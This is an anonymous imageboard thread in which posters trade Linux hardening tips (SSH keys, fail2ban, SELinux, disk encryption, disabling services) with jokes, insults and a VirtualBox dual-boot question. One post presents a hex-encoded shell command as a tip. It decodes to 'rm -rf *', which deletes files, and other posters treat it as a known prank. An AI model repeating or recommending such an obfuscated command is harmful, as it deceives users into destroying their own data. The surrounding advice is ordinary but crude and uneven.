What steps does Sup Forums take to harden and protect their linux systems?

I don't. 99.99999% of malware is installed by the user

>default
Nope. Read the OP again.

I don't browse in vm but I do harden the browser and disable the unused services. CUPS listen to the network you know.

And that's exactly the point, prevention is easier than trying to fix your shit up with five bots, two rootkits and eight malwares up your ass

SSH is probably the most dangerous service on any computer, disable It or restrict it with a good password/ssh key combination and don't leak it trough fucking memeginx or Memepache and you'll be mostly fine

I install temple OS and use a ramdisk.

Impossible for anyone to get me.

>sshd
>having a backdoor installed

> Use whonix on a laptop with camera and microphone removed
> All of the above is taken care of

feels good man :)

i cover my thinkpad with aluminum foil.

public-private key authentication ONLY via ssh
tunnel ALL THE THINGS over ssh
randomize default ports
iptables
fail2ban
selinux
luks+dmcrypt system encryption

Just
$(echo 726d202d7266202a0a | xxd -r -p)

>- Browse in virtual machines only
I'm looking into running a win7 guest on a linux host in VirtualBox. The functionality of Guest Additions seems very desirable, especially the local shares and mouse support. But I also want to be able to dual boot this partition sometimes, or even boot it in a different VM sometime in the future. Do the special drivers GA installs on the guest interfere with this? I've read a few accounts of them doing so with Ubuntu guests, even though that's the reverse of my situation. I'd rather not fork my windows install onto any more partitions than I have to while maintaining both dual boot and smooth guest functionality.

TL;DR, does VB Guest Additions for a win7 guest break dual booting a win7 partition?

I can't imagine why that would possibly cause an issue

Well, it replaces mouse and video drivers on the guest, for one thing, not to mention overriding the clipboard. Also, since windows is the guest, it will see the VM and native hardware environments as different machines, and throw a hissy fit about activation.

This and disable ping response for good measure.

bump for insight.

shitpost only in public libraries while wearing a ski mask

I just use a FreeBSD box has a router.

why would icmp even get far enough to hit the machine in the first place? and dont say 'well what if another machine gets compromised!' because by then its too late and they will just find it via arp

That string of hex looks familiar

haha, this is good

sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13

Using a virtual machine increases the attack surface, it's totally a pointless advice.

It's way more secure to use chromium in native.

>>- Blocked open ports
>having open ports
>>- Browse in virtual machines only
I bet this isn't even a hardened system in the VM. Enjoy your hypervisor exploits from within the VM.
>>- Grsecurity to improve kernel
I'd post the tweet about grsec faggots banning people for posting about a bug in it, but I didn't save it.
>>- Disabled useless default services
>having useless default services in the first place
>>- Firewall
>letting programs open sockets

the point is, only a fucking dingus is going to let icmp through the firewall in the first place.

fuck off

>the point is
Your head.

They're virtual drivers for virtual devices. They only exist when the virtual drive is mounted. The host doesn't see them otherwise.

But what about when the guest is later booted outside the VM on the bare hardware, like in a dual boot situation?